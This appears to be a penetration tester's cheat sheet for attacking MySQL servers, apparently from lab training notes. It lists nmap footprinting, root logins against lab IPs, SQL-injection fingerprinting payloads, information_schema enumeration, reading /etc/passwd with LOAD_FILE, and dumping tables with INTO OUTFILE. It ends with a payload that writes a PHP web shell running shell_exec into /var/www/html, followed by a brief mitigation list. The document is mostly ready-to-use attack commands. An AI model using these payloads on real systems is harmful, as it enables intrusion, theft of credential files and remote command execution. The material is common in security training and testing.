MySQL (3306)

CVE-2012-2122 in MySQL 5.6.x

Footprinting using nmap

sudo nmap 10.129.14.128 -sV -sC -p3306 --script mysql*

Interacting to the mysql server

without password

mysql -u root -h 10.129.14.132

with password

mysql -u root -pP4SSw0rd -h 10.129.14.128

Commands

Command	Description
mysql -u <user> -p<password> -h <IP address>	Connect to the MySQL server. There should not be a space between the '-p' flag, and the password.
show databases;	Show all databases.
use <database>;	Select one of the existing databases.
show tables;	Show all available tables in the selected database.
show columns from <table>;	Show all columns in the selected database.
select * from <table>;	Show everything in the desired table.
select * from <table> where <column> = "<string>";	Search for needed stringin the desired table.
INSERT INTO logins VALUES(1, 'admin', 'p@ssw0rd', '2020-07-02');	insert values
describe <table>	show table columns and data types

Types of SQL Injection

Footprinting

How to check if the DB is mysql

Payload	When to Use	Expected Output	Wrong Output
SELECT @@version	When we have full query output	MySQL Version 'i.e. 10.3.22-MariaDB-1ubuntu1'	In MSSQL it returns MSSQL version. Error with other DBMS.
SELECT POW(1,1)	When we only have numeric output	1	Error with other DBMS
SELECT SLEEP(5)	Blind/No Output	Delays page response for 5 seconds and returns 0.	Will not delay response with other DBMS

Gettings Schema Names and Tables

schema_name from information_schema.schemata

table_name from information_schema.tables where table_schema=database()

column_name from information_schema.columns where table_name='table'

Reading Files

Getting Username

SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user

Getting User Privileges

SELECT super_priv FROM mysql.user
SELECT grantee, privilege_type FROM information_schema.user_privileges

Reading the file

SELECT LOAD_FILE('/etc/passwd');

Writing Files

Pre-requisites

1. User with FILE privilege enabled

2. MySQL global secure_file_priv variable not enabled

3. Write access to the location we want to write to on the back-end server

Get File Privilege

SHOW VARIABLES LIKE 'secure_file_priv';
SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"

Note: if secure_file_priv is empty, we can write

Writing to a file

SELECT * from users INTO OUTFILE '/tmp/credentials';

Finding the base web dir

• /etc/apache2/apache2.conf - Apache

• /etc/nginx/nginx.conf - Nginx

• %WinDir%\System32\Inetsrv\Config\ApplicationHost.config - IIS

• https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt

• https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt

Tip: Advanced file exports utilize the 'FROM_BASE64("base64_data")' function in order to be able to write long/advanced files, including binary data.

SQLi Mitigation

• Input Sanitization via mysqli_real_escape_string

• Input Validation via regex for example

• Limiting User Privileges

• Using WAF

• Parameterized Queries via mysqli_stmt_bind_param

---

Misconfigurations

• anonymous access is enabled

• users without password

Privileges

• Read or change the contents of a database

• Read or change the server configuration

• Execute commands

• Read local files

• Communicate with other databases

• Capture the local system hash

• Impersonate existing users

• Gain access to other networks

Protocol Specific Attacks

Code execution

not normal but can be encountered since there can be user-defined functions (c/c++) in mysql

Write Local Files

mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

mysql> show variables like "secure_file_priv"; # must be empty so we can write

Reading Local Files

mysql> select LOAD_FILE("/etc/passwd");

Note: by default, this is not enabled